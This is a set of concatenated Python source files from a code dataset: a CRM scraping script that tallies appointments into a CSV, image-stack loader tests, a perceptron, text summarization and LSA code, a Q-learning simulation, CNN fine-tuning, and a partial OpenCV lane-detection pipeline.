Shown : ',s)\n\n for i in evenRows:\n s = i.text\n s = s.split('\\n')\n s = [x for x in s if x]\n t = [i.split(' ') for i in s]\n if len(t) > 0:\n import operator\n flat_list = reduce(operator.add, t)\n flat_list = [x for x in flat_list if x]\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if 'Appointment' in s[1]:\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ', s)\n if today in flat_list and 'Complete' in flat_list[-2] and 'Edit' in flat_list[-1]:\n if 'Appointment' in s[1]:\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ', s)\n\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if ('Show' in flat_list[3]) and ('No Show' not in flat_list[3]):\n result[source_type][source_detail]['S'] += 1\n print(' Shown : ', s)\n WebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'gvOpptyHistory')))\n div_comp_contacts = browser.find_element_by_id('gvOpptyHistory')\n rows_cch = div_comp_contacts.find_elements_by_tag_name('tr')\n if 'Sold - CRM Sold' in rows_cch[0].text or 'Sold - DMS Sold' in rows_cch[0].text and date.today().strftime(\"%m/%d/%y\") in rows_cch[0].text:\n result[source_type][source_detail]['C'] += 1\n browser.close()\n browser.switch_to.window(browser.window_handles[0])\nbrowser.quit()\ncount = -1\ndf = pd.DataFrame(columns=['Date', 'month', 'Day of week', 'source_type', 'source_detail', 'L', 'A', 'S', 'C'])\nfor src_type in result:\n for src in result[src_type]:\n count += 1\n df.loc[count] = [today, month_of_year, day_of_week, src_type.strip(), src.strip(), result[src_type][src]['L'],\n result[src_type][src]['A'], result[src_type][src]['S'], result[src_type][src]['C']]\ntoday = \"{}-{}-{}\".format(month, day, year)\ndf.to_csv('LASC_{}.csv'.format(today))\n# time.sleep(1)\n# import boto3\n#\n# s3 = boto3.resource('s3')\n# data = open('LASC_{}.csv'.format(today), 'rb')\n# s3.Bucket('eleads-scraper-data').put_object(Key='LASC/LASC_{}.csv'.format(today), Body=data)","sub_path":"Eleads/Eleads-current.py","file_name":"Eleads-current.py","file_ext":"py","file_size_in_byte":8619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"374475279","text":"import os\nimport sys\nimport shutil\nimport tempfile\n\nimport numpy\nimport vigra\n\nfrom lazyflow.utility import PathComponents\nfrom lazyflow.graph import Graph\nfrom lazyflow.operators.ioOperators import OpInputDataReader, OpStackLoader\nfrom lazyflow.operators.opReorderAxes import OpReorderAxes\n\nclass TestOpStackLoader(object):\n \n # TODO: Test with multiple channels.\n \n def setUp(self):\n self._tmp_dir = tempfile.mkdtemp()\n \n def tearDown(self):\n shutil.rmtree(self._tmp_dir)\n \n def _prepare_data_zyx(self):\n file_base = self._tmp_dir + \"/rand_3d\"\n \n X,Y = (100,100)\n Z = 10\n rand_data_3d = numpy.random.random((Z, Y, X))\n rand_data_3d *= 256\n rand_data_3d = rand_data_3d.astype(numpy.uint8)\n rand_data_3d = vigra.taggedView( rand_data_3d, 'zyx' )\n \n for z in range(Z):\n file_name = file_base + \"_z{}.tiff\".format(z)\n vigra.impex.writeImage( rand_data_3d[z,:,:], file_name )\n \n return ( rand_data_3d, file_base + \"*.tiff\" )\n \n def test_xyz(self):\n expected_volume_zyx, globstring = self._prepare_data_zyx()\n \n graph = Graph()\n op = OpStackLoader( graph=graph )\n op.globstring.setValue( globstring )\n \n assert len(op.stack.meta.axistags) == 4\n assert op.stack.meta.getAxisKeys() == list('xyzc')\n assert op.stack.meta.dtype == expected_volume_zyx.dtype\n \n vol_from_stack_xyzc = op.stack[:].wait()\n vol_from_stack_xyzc = vigra.taggedView( vol_from_stack_xyzc, 'xyzc' )\n vol_from_stack_zyx = vol_from_stack_xyzc.withAxes( *'zyx' )\n \n assert ( vol_from_stack_zyx == expected_volume_zyx ).all(), \"3D Volume from stack did not match expected data.\"\n\n def _prepare_data_tzyx(self):\n file_base = self._tmp_dir + \"/rand_4d\"\n \n X,Y = (100,100)\n Z = 10\n T = 5\n rand_data_4d = numpy.random.random((T, Z, Y, X))\n rand_data_4d *= 256\n rand_data_4d = rand_data_4d.astype(numpy.uint8)\n rand_data_4d = vigra.taggedView( rand_data_4d, 'tzyx' )\n\n for t in range(T): \n file_name = file_base + \"_t{}.tiff\".format(t)\n for z in range(Z):\n vigra.impex.writeImage( rand_data_4d[t, z,:,:], file_name, mode='a' )\n \n return ( rand_data_4d, file_base + \"*.tiff\" )\n\n def test_txyz(self):\n expected_volume_tzyx, globstring = self._prepare_data_tzyx()\n \n graph = Graph()\n op = OpStackLoader( graph=graph )\n op.globstring.setValue( globstring )\n \n assert len(op.stack.meta.axistags) == 5\n assert op.stack.meta.getAxisKeys() == list('txyzc')\n assert op.stack.meta.dtype == expected_volume_tzyx.dtype\n \n vol_from_stack_txyzc = op.stack[:].wait()\n vol_from_stack_txyzc = vigra.taggedView( vol_from_stack_txyzc, 'txyzc' )\n vol_from_stack_tzyx = vol_from_stack_txyzc.withAxes( *'tzyx' )\n \n assert ( vol_from_stack_tzyx == expected_volume_tzyx ).all(), \"4D Volume from stack did not match expected data.\"\n \n\nif __name__ == \"__main__\":\n import sys\n import nose\n sys.argv.append(\"--nocapture\") # Don't steal stdout. Show it on the console as usual.\n sys.argv.append(\"--nologcapture\") # Don't set the logging level to DEBUG. Leave it alone.\n ret = nose.run(defaultTest=__file__)\n if not ret: sys.exit(1)\n \n ","sub_path":"tests/testOpStackLoader.py","file_name":"testOpStackLoader.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"252656650","text":"class node:\n x=0\n y=0\n ans=0\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.ans = x & y\n\nclass gan:\n dataset = []\n w = []\n b = 0\n kxin=0\n def __init__(self,kx):\n self.kxin=kx\n self.b=0\n self.create_data()\n self.w.append(0)\n self.w.append(0)\n def create_data(self):\n for i in range(0, 2):\n for j in range(0, 2):\n self.dataset.append(node(i, j))\n\n def train(self):\n for i in range(0,10):\n for i in range(0, len(self.dataset)):\n tmp = self.calu(self.dataset[i].x,self.dataset[i].y)\n self.update(self.dataset[i], tmp)\n self.debug()\n\n def calu(self,x,y):\n ans=self.f(self.w[0]*x+self.w[1]*y+self.b)\n return ans\n\n def update(self, t, cal):\n self.w[0]=self.w[0]+self.kxin*(t.ans-cal)*t.x\n self.w[1]=self.w[1]+self.kxin*(t.ans-cal)*t.y\n self.b=self.b+self.kxin*(t.ans-cal)\n\n def debug(self):\n print ('w[0]: %f\\n' %self.w[0])\n print ('w[1]: %f\\n' %self.w[1])\n print ('b: %f\\n' %self.b)\n\n def f(self, x):\n if x > 0:\n return 1\n else:\n return 0\n\n\ntg=gan(0.1)\ntg.train()\nfor i in range(0,5):\n x=input(\"please input x:\")\n y=input(\"plea1se input y:\")\n print(\"value: %d\\n\" %int(tg.calu(float(x),float(y))))\n\n\n\n\n\n\n","sub_path":"ganzhiqi.py","file_name":"ganzhiqi.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"411449753","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division, print_function, unicode_literals\n\nimport unittest\n\nfrom os.path import abspath, dirname\nfrom nlp_sum.my_sum.utils import get_stop_words\nfrom nlp_sum.my_sum.parse.plaintext import PlaintextParser\nfrom nlp_sum.my_sum.method.extract_summarizer.nmf import NmfSummarizer\n\nfrom nlp_sum.my_sum.similarity.cosine_sim import compute_tf, compute_idf\nfrom nlp_sum.my_sum.similarity.cosine_sim import cosine_similarity\n\nfrom nlp_sum.test.utils_for_test import get_cn_sentence_length, get_en_sentence_length\n\n\nclass testLSA(unittest.TestCase):\n\n def test_summarizer(self):\n summarizer_en = NmfSummarizer(\"english\")\n summarizer_en_stem = NmfSummarizer(\"english\", True)\n summarizer_cn = NmfSummarizer(\"chinese\")\n\n data_file_path = abspath(dirname(__file__)) + '/data'\n cn_data_file_path = data_file_path + '/chinese/'\n en_data_file_path = data_file_path + '/english/'\n parser_cn = PlaintextParser(\"chinese\")\n parser_en = PlaintextParser(\"english\")\n\n document_set_cn = parser_cn.build_documentSet_from_dir(\n cn_data_file_path\n )\n document_set_en = parser_en.build_documentSet_from_dir(\n en_data_file_path\n )\n\n summarizer_cn.stop_words = get_stop_words(\"chinese\")\n summarizer_en.stop_words = get_stop_words(\"english\")\n\n summary_cn = summarizer_cn(document_set_cn, 100)\n summary_cn_length = sum(get_cn_sentence_length(sentence) for sentence in summary_cn)\n summary_cn_text = ''.join(sentence._texts + '。' for sentence in summary_cn)\n\n # summary_cn_mmr = summarizer_cn(document_set_cn, 100, method=\"MMR\")\n summary_cn_mmr = summarizer_cn(document_set_cn, 100, method=\"MMR\", metric=\"tfidf\")\n summary_cn_mmr_length = sum(get_cn_sentence_length(sentence) for sentence in summary_cn_mmr)\n summary_cn_text_mmr = ''.join(sentence._texts + '。' for sentence in summary_cn_mmr)\n\n summary_en_tfidf = summarizer_en(document_set_en, 100, method=\"MMR\", metric=\"tfidf\")\n summary_en_tfidf_length = sum(get_en_sentence_length(sentence) for sentence in summary_en_tfidf)\n summary_en_text_tfidf = ' '.join(sentence._texts for sentence in summary_en_tfidf)\n\n summary_en_mmr = summarizer_en(document_set_en, 100, method=\"MMR\")\n summary_en_mmr_length = sum(get_en_sentence_length(sentence) for sentence in summary_en_mmr)\n summary_en_text_mmr = ' '.join(sentence._texts for sentence in summary_en_mmr)\n\n print(\"-----------------------------chinese default-------------------------------\")\n print(summary_cn_text)\n print(\"the summary length is {}\".format(summary_cn_length))\n print(\"-----------------------------chinese MMR-------------------------------\")\n print(summary_cn_text_mmr)\n print(\"the summary length is {}\".format(summary_cn_mmr_length))\n print(\"-----------------------------english tfidf-------------------------------\")\n print(summary_en_text_tfidf)\n print(\"the summary length is {}\".format(summary_en_tfidf_length))\n print(\"-----------------------------english MMR-------------------------------\")\n print(summary_en_text_mmr)\n print(\"the summary length is {}\".format(summary_en_mmr_length))\n\n self.assertLessEqual(summary_en_tfidf_length, 100)\n self.assertLessEqual(summary_en_mmr_length, 100)\n self.assertLessEqual(summary_cn_length, 100)\n self.assertLessEqual(summary_cn_mmr_length, 100)\n\n #diction = summarizer_cn._create_dictionary(document_set_cn)\n #print(len(diction))\n #sentence_number = [len(doc.sentences) for doc in document_set_cn.documents]\n #print(sentence_number)\n","sub_path":"test/testNMF.py","file_name":"testNMF.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"68885128","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 6 05:35:25 2019\r\n\r\n@author: wuxx1\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 6 02:45:40 2019\r\n\r\n@author: wuxx1\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport time\r\nimport array as arr\r\nstart_time = time.time()\r\n\r\nN = 1000\r\nM = 5\r\nP_regulated = 12\r\nP_overhedge = 9\r\n\r\nS2=[0, 0, 10, 5]\r\nQ2 = np.zeros((M,6))\r\nq3 = np.zeros((M,N,5))\r\nq2 = np.zeros((M,1,5))\r\n# Let us suppose I will have different P & D samples. then based on different actions (0:16)\r\nprice_change =[1,-1]\r\nprice_probabilities =[0.5,0.5]\r\nPRAND = np.random.choice(price_change,N,p=price_probabilities)\r\n#PRAND = [1,-1,1]\r\ndemand_change =[1,-1]\r\ndemand_probabilities =[0.67,0.33]\r\nDRAND = np.random.choice(demand_change,N,p=demand_probabilities)\r\n#DRAND = - PRAND\r\n#DRAND = [-1,1,-1]\r\n\r\n# Stepsize\r\nalpha1 = 0.1\r\nalpha2 = 0.1 \r\n# Gamma for Q-learning\r\ngamma = 1\r\n\r\n\r\nfor j in range(len(Q2)):\r\n istart_time = time.time()\r\n #temp = 2*(S2[3]-S2[1])\r\n A2 = int(j)\r\n #P3 = np.zeros(N,)\r\n P3 = S2[2]+PRAND\r\n #for l in range(len(PRAND)):\r\n #P3[l] = S2[2] + PRAND[l]\r\n \r\n #D3 = np.zeros(N,)\r\n #for l in range(len(DRAND)):\r\n #D3[l] = S2[3] + DRAND[l]\r\n D3 = S2[3]+DRAND\r\n \r\n S3 = np.zeros((N,4))\r\n for i in range(N):\r\n if S2[1]+A2 == 0:\r\n S3[i] = [0, 0, P3[i], D3[i]]\r\n else: \r\n S3[i] = [(S2[0]*S2[1]+S2[2]*A2)/(S2[1]+A2), S2[1]+A2, P3[i], D3[i]]\r\n \r\n # For every S3, I will generate 500 S_4\r\n P4 = np.zeros((len(S3),N))\r\n D4 = np.zeros((len(S3),N))\r\n A3 = np.arange(0, 2*(abs(max(S3[:,1]-S3[:,3])))+2,1)\r\n S4 = np.zeros((len(S3),N,len(A3),4))\r\n \r\n for k in range(len(A3)): \r\n for l in range(len(S3)):\r\n \r\n P4[l,:] = P3[l]+PRAND\r\n \r\n D4[l,:] = D3[l]+DRAND\r\n for i in range(N):\r\n if S3[l,1]+A3[k] ==0:\r\n S4[l,i,k,:] =[0,0,P4[l,i],D4[l,i]]\r\n else:\r\n S4[l,i,k,:] =[(S3[l,0]*S3[l,1]+S3[l,2]*A3[k])/(S3[l,1]+A3[k]),S3[l,1]+A3[k],P4[l,i],D4[l,i]]\r\n \r\n \r\n # Calcualted Q_4(S4), all my boundray conditions \r\n Q4 = np.zeros((len(S3),N,len(A3),6))\r\n for k in range(len(A3)):\r\n for l in range(len(S3)):\r\n for i in range(N):\r\n Q4[l,i,k,:] = [S4[l,i,k,0],S4[l,i,k,1], S4[l,i,k,2],S4[l,i,k,3], A3[k],P_regulated*D4[l,i]-S4[l,i,k,0]*S4[l,i,k,1]-P4[l,i]*max(D4[l,i]-S4[l,i,k,1],0)-P_overhedge*max(-D4[l,i]+S4[l,i,k,1],0)]\r\n \r\n # Backpropagation Q-learning\r\n # Actually, I don't need to track the every updates for my Q_{N-1}(S,a).However, for now, I would like to understand the details of updating\r\n # I will first recall a typical Q-learning method\r\n \"\"\"\r\n Initialize Q(S,a)\r\n Repeat (for each episode):\r\n Initialize S\r\n Repeat(for each step of episode):\r\n Choose a from S using policy derived from Q\r\n (e.g. epsilon-greedy)\r\n Take action a, Observe r,S'\r\n Q(S,a) <-- Q(S,a) + alpha*[r + gamma max_a' Q(S',a') - Q(S,a)]\r\n S <-- S'\r\n Unitl S is terminal\r\n \"\"\" \r\n # My main function will be Q_{N-1}(S,a) = Q_{N-1}(S,a) + alpha*[0 + gamma* Q_N(S') - Q_{N-1}(S,a)] \r\n \r\n\r\n#if False: \r\n # Compute Q3 based on Q4, all the boundary conditions\r\n Q3 = np.zeros((len(S3),len(A3),6))\r\n for k in range(len(A3)):\r\n for l in range(len(S3)): \r\n for i in range(N): \r\n Q3[l,k,:] = [S3[l,0],S3[l,1],S3[l,2],S3[l,3],A3[k],Q3[l,k,5] + alpha1 *(0 + gamma*Q4[l,i,k,5] - Q3[l,k,5])]\r\n alpha1 = 1/(i+1)\r\n \r\n # Compute Q2 based on Q3 \r\n for l in range(N):\r\n Q2[j,:] = [S2[0],S2[1],S2[2],S2[3],A2,Q2[j,5]+alpha2*(0+gamma*max(Q3[l,:,5]) - Q2[j,5])]\r\n alpha2 = 1/(l+1)\r\n \r\n \r\n for l in range(len(S3)):\r\n Index = np.argmax(Q3[l,:,5])\r\n q3[j,l,:]=[S3[l,0],S3[l,1],S3[l,2],S3[l,3],Q3[l,Index,4]]\r\n \r\n \r\n print(\"This iteration--- %s seconds ---\" % (time.time() - istart_time)) \r\n#if False:\r\n for l in range(len(Q2)):\r\n Index = np.argmax(Q2[:,5])\r\n q2[j,:] = [S2[0],S2[1],S2[2],S2[3],Q2[Index,4]] \r\n \r\nprint(\"--- %s seconds ---\" % (time.time() - start_time)) \r\n\r\n","sub_path":"python/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"414868999","text":"import numpy as np\r\nfrom configargparse import ArgParser\r\nimport torch\r\nimport torch.utils.data as Data\r\nfrom torch.optim import lr_scheduler\r\nfrom torchnet.meter import AverageValueMeter\r\nfrom tqdm import tqdm\r\nimport os\r\nimport torch.nn.functional as F\r\n\r\nclass myCNN(torch.nn.Module):\r\n def __init__(self, input_channel, output_feature_seq_length,Height,Width,out_channel=48, kernel_size=3, stride=3):\r\n \"\"\"\r\n :param size:一日数据\r\n :param day: n日\r\n :param hidden_dim:隐藏层神经元\r\n :param layer_dim: 隐藏层个数\r\n :param output_dim: 输出\r\n \"\"\"\r\n super(myCNN, self).__init__()\r\n self.HeightNew = (Height - kernel_size) // stride + 1\r\n self.WidthNew = (Width - kernel_size)//stride + 1\r\n self.cnn = torch.nn.Conv2d(in_channels=input_channel, kernel_size=kernel_size, stride=stride, out_channels=out_channel)\r\n self.dense = torch.nn.Linear(in_features=out_channel * self.HeightNew * self.WidthNew, out_features=output_feature_seq_length)\r\n\r\n def forward(self, x):\r\n x = self.cnn(x)\r\n\r\n x = F.relu(x, inplace=True)\r\n\r\n x = x.view(x.shape[0], -1)\r\n x = self.dense(x)\r\n return x\r\n\r\ndef train_conv(net,lr,train_loader,total_epoch):\r\n global_step = 1\r\n optimizer = torch.optim.Adam(net.parameters(), lr=lr)\r\n scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[i for i in range(0, 500, 150)][1:], gamma=0.05)\r\n loss_func = torch.nn.MSELoss()\r\n loss_metrics = AverageValueMeter()\r\n ########## training set##########\r\n for epoch in range(total_epoch):\r\n epoch_loss = 0\r\n for step, (x, y) in tqdm(enumerate(train_loader)):\r\n output = net(x)\r\n ##########加mask训练\r\n loadData = np.load('../../A.npy')\r\n loadData = torch.tensor(loadData.reshape(loadData.shape[0] * loadData.shape[1]),\r\n dtype=torch.float32).cuda()\r\n output = output * loadData\r\n y = y * loadData\r\n ##########\r\n train_loss = loss_func(output, y)\r\n optimizer.zero_grad()\r\n train_loss.backward()\r\n optimizer.step()\r\n global_step = global_step + 1\r\n epoch_loss += train_loss.item()\r\n loss_metrics.add(train_loss.item())\r\n print(\"[epcho {}]:loss {}\".format(epoch, loss_metrics.value()[0]))\r\n loss_metrics.reset()\r\n scheduler.step()\r\n\r\n return net\r\n\r\n\r\n\r\ndef main(lr,total_epoch,model_name,batch_size):\r\n dir = r\"./data-con-model\"\r\n if not os.path.exists(dir):\r\n os.mkdir(dir)\r\n features_train=np.load('../../SMAPtest/conv-model/data-con-model/features_train.npy')\r\n label_train = np.load('../../SMAPtest/conv-model/data-con-model/label_train.npy')\r\n\r\n print('finished loading data for finetune-conv model')\r\n\r\n features_train = torch.tensor(features_train.reshape(-1, features_train.shape[1]*features_train.shape[2],\r\n features_train.shape[3],features_train.shape[4]),\r\n dtype=torch.float32).cuda()\r\n\r\n label_train = torch.tensor(label_train.reshape(-1, label_train.shape[1]*label_train.shape[2]), dtype=torch.float32).cuda()\r\n\r\n dataset = Data.TensorDataset(features_train, label_train)\r\n train_loader = Data.DataLoader(\r\n dataset=dataset,\r\n batch_size=batch_size,\r\n shuffle=True,\r\n num_workers=0\r\n )\r\n # TODO: build CNN model\r\n net = torch.load('../../ERA5test/conv-model/data-con-model/con_params.pkl')\r\n net.cuda()\r\n # TODO: train CNN model\r\n model=train_conv(net,lr,train_loader,total_epoch)\r\n print('finished training conv model')\r\n torch.save(model, './data-con-model/con_params.pkl')\r\n\r\n\r\nif __name__ == '__main__':\r\n p = ArgParser()\r\n p.add_argument('--lr', type=float, default=1e-3, help='Learning rate')\r\n p.add_argument('--total_epoch', type=int, default=30, help='total epochs for training the model')\r\n p.add_argument('--model_name', type=str, default='Conv-model', help='name for prediction model')\r\n p.add_argument('--batch_size', type=int, default=128, help='batch_size')\r\n args = p.parse_args()\r\n\r\n main(\r\n lr=args.lr,\r\n total_epoch=args.total_epoch,\r\n model_name=args.model_name,\r\n batch_size=args.batch_size\r\n )\r\n\r\n","sub_path":"fintune-SMAPtest/conv-model/train-fintune-conv-model.py","file_name":"train-fintune-conv-model.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"444356815","text":"\nimport typing\n\nfrom typing import List, Any\n\nimport nltk\nfrom nltk.corpus import stopwords\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\n\ndef extract_tokens(tweet_tuples:List[Any])->List[Any]:\n tokens_list = []\n\n for tweet_dict, classification in tweet_tuples:\n for key in tweet_dict.keys():#dict\n tokens_list.append(key)\n return tokens_list\n\ndef latent_semantic_analysis(data:List[Any]=[],language:str=\"english\", num_comps:int=100 ):\n # Num_comps = 100 a recommended by sklearn documentation for LSA\n stop_set = set(stopwords.words(language))\n\n vectorizer = TfidfVectorizer(stop_words=stop_set, use_idf=True, ngram_range=(1,3)) \n \n #loads all the data from the list onto the matrix,\n # with words and their freqs\n text_data = extract_tokens(data)#tokens\n doc_matrix = vectorizer.fit_transform(text_data)\n\n lsa = TruncatedSVD(n_components=num_comps, n_iter=100)\n\n lsa.fit(doc_matrix)\n\n #first row for V ^(T) (transposed)\n #lsa.components_[0]\n\n terms = vectorizer.get_feature_names()\n\n for i , comp in enumerate(lsa.components_):\n term_in_comp = zip(terms, comp)\n\n #first 10 sorted terms only, for whatever reason\n sorted_terms = sorted(term_in_comp, key=lambda x:x[1], reverse=True)[:10]\n\n print(f\"Concept[{i}]:\\n\\t\")\n\n #list of tuples\n # first value is the concept\n #second value is the frequency\n for term in sorted_terms:\n \n print(term)\n print(f\"\\t{term[0]}\")\n\n print()\n \n return\n\n\n","sub_path":"data_processing/lsi.py","file_name":"lsi.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"123881152","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport os\n\ndef grayscale(img):\n \"\"\"Applies the Grayscale transform\n This will return an image with only one color channel\n but NOTE: to see the returned image as grayscale\n (assuming your grayscaled image is called 'gray')\n you should call plt.imshow(gray, cmap='gray')\"\"\"\n # return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Or use BGR2GRAY if you read an image with cv2.imread()\n return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ndef canny(img, low_threshold, high_threshold):\n \"\"\"Applies the Canny transform\"\"\"\n return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n \"\"\"Applies a Gaussian Noise kernel\"\"\"\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Applies an image mask.\n\n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img)\n\n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n\n #filling pixels inside the polygon defined by \"vertices\" with the fill color\n cv2.fillPoly(mask, vertices, ignore_mask_color)\n\n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n\ndef draw_lines(img, lines, color=[0, 0, 255], thickness=2):\n \"\"\"\n NOTE: this is the function you might want to use as a starting point once you want to\n average/extrapolate the line segments you detect to map out the full\n extent of the lane (going from the result shown in raw-lines-example.mp4\n to that shown in P1_example.mp4).\n\n Think about things like separating line segments by their\n slope ((y2-y1)/(x2-x1)) to decide which segments are part of the left\n line vs. the right line. Then, you can average the position of each of\n the lines and extrapolate to the top and bottom of the lane.\n\n This function draws `lines` with `color` and `thickness`.\n Lines are drawn on the image inplace (mutates the image).\n If you want to make the lines semi-transparent, think about combining\n this function with the weighted_img() function below\n \"\"\"\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(img, (x1, y1), (x2, y2), color, thickness)\n\ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):\n \"\"\"\n `img` should be the output of a Canny transform.\n\n Returns an image with hough lines drawn.\n \"\"\"\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n draw_lines(line_img, lines)\n return line_img, lines\n\n# Python 3 has support for cool math symbols.\n\ndef weighted_img(img, initial_img, α=0.8, β=1., λ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n\n `initial_img` should be the image before any processing.\n\n The result image is computed as follows:\n\n initial_img * α + img * β + λ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, λ)\n\n\n\n\n# TODO: Build your pipeline that will draw lane lines on the test_images\n# then save them to the test_images directory.\nclass LaneFinding:\n\n def __init__(self, test_image_dir):\n self.input_dir = test_image_dir\n self.output_dir = test_image_dir\n\n def load_image(self, image_name):\n image = cv2.imread(\"%s/%s\" % (self.input_dir, image_name))\n return image\n\n def save_image(self, image_name, image):\n return cv2.imwrite(\"%s/%s\" % (self.output_dir, image_name), image)\n\n def slope_binning(self, lines):\n \"\"\"\n Binning lines by their slopes, into two bins,\n one for positive, another for negative\n \"\"\"\n positve_idx = 0\n negative_idx = 1\n\n binnings = [[], []]\n slopes = [[], []]\n binnings[positve_idx] = []\n binnings[negative_idx] = []\n\n for line in lines:\n dx, dy = line[0][0:2] - line[0][2:4]\n slope = dy / dx\n if slope >= 0:\n binnings[positve_idx].append(line)\n slopes[positve_idx].append(slope)\n else:\n binnings[negative_idx].append(line)\n slopes[negative_idx].append(slope)\n\n return binnings, slopes\n\n def scan_binning(self, binning, slopes, delta_slope_err=0.07):\n filtered_binning = []\n filtered_slopes = []\n median_slope = np.median(slopes)\n for i, slope in enumerate(slopes):\n if abs(slope - median_slope) <= delta_slope_err:\n filtered_binning.append(binning[i])\n filtered_slopes.append(slope)\n\n #TODO: empty filtered_binning\n _max_vec = np.max(filtered_binning, axis=0)\n max_vpos = np.max([_max_vec[0][1], _max_vec[0][3]])\n _min_vec = np.min(filtered_binning, axis=0)\n min_vpos = np.min([_min_vec[0][1], _min_vec[0][3]])\n\n step = 5\n vpos = min_vpos\n scanned_middle_points = []\n scanned_lane_width = []\n while vpos < max_vpos:\n holder = []\n for line in filtered_binning:\n if (vpos - line[0][1]) * (vpos - line[0][3]) < 0:\n holder.append([self.get_horizontal_pos(vpos, line), vpos, ])\n if len(holder) >= 2:\n break\n if len(holder) >= 2:\n width = abs(holder[0][0] - holder[1][0])\n if width > 2:\n scanned_middle_points.append(np.average(holder, axis=0))\n scanned_lane_width.append(width)\n vpos += step\n\n return scanned_middle_points, scanned_lane_width\n\n def get_horizontal_pos(self, vpos, line):\n k = (line[0][1] - vpos) / (vpos - line[0][3])\n return (line[0][0] + k * line[0][2]) / (1 + k)\n\n def fit_line(self, points, widths, thickiria=0.6, vmax=539, vmin=330):\n thickness = widths[-1] * thickiria\n _line = np.array([np.concatenate([points[0], points[-1]])])\n #vmin = min(vmin, points[0][1])\n #vmax = max(vmax, points[1][1])\n hmax = self.get_horizontal_pos(vmax, _line)\n hmin = self.get_horizontal_pos(vmin, _line)\n expanded_line = np.array([list(map(int, [hmax, vmax, hmin, vmin]))])\n return expanded_line, 13#thickness\n\n def pipeline(self, img):\n copy = np.copy(img) * 0\n\n gray_image = grayscale(img)\n\n kernel_size = 5\n blurred_image = gaussian_blur(gray_image, kernel_size)\n\n low_threshold = 100\n high_threshold = 200\n edges = cv2.Canny(blurred_image, low_threshold, high_threshold)\n\n vertices = np.array([[(0, 540), (960, 540), (480, 330)]], np.int32)\n masked_image = region_of_interest(edges, vertices)\n\n rho = 1\n theta = np.pi / 135\n threshold = 1\n min_line_len = 10\n max_line_gap = 4\n hough_lines_image, lines = hough_lines(\n masked_image, rho, theta, threshold, min_line_len, max_line_gap)\n\n hough_image = weighted_img(hough_lines_image, img)\n return hough_image\n #cv2.imshow(\"hough\", blended_image)\n #cv2.waitKey(-1)\n\n binnings, slopes = self.slope_binning(lines)\n\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n for b, s in zip(binnings, slopes):\n middle_points, lane_widths = self.scan_binning(\n b, s, delta_slope_err=0.1)\n if len(lane_widths) <= 1:\n continue\n line, thickness = self.fit_line(middle_points, lane_widths)\n draw_lines(line_img, [line, ], thickness=int(thickness))\n\n blended_image = weighted_img(line_img, img)\n #cv2.imshow(\"mine\", blended_image)\n #cv2.waitKey(-1)\n return hough_image\n\n\n def run_image_dir(self):\n for image_name in os.listdir(self.input_dir):\n if image_name.startswith(\"output_\"):\n continue\n #if image_name != \"solidYellowCurve2.jpg\":\n # continue\n\n image = self.load_image(image_name)\n\n output_image = self.pipeline(image)\n\n self.save_image(\"output_%s\" % image_name, output_image)\n\n\n def run_image(self, image):\n output_image = self.pipeline(image)\n return output_image\n\n\ndef test():\n lf = LaneFinding(\"test_images\")\n 